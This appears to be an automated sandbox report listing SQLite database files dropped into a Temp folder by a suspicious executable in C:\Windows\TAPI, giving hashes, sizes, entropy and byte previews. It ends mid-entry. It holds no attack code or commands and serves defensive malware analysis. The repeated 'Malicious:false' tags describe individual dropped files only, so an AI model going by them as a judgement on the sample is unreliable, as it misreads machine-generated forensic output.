                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\D1LRBVNEx9

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\D34oAtx8qB

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\DJI71lnPQo

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Df9VY0XgNF

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\DgtTTFLTW3

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\EI9cgKzK2a

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\EJMkEXj0lk

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\EK6xeVi4QL

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ErsxpeKTpY

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\EslM21b2TE

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\F2rKmJMGzD

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\F7zQhZUX3U

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\FTKGik8qmg

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Fg8TsxLY0Z

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\FnNihGe0tb

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\GDRFGSZgcu

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Gw5yMSWCtv

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\H31YsMruN5

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\HO3vSZJ1IY

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\HUs3xpJmtS

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\HZBdLMcYMl

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
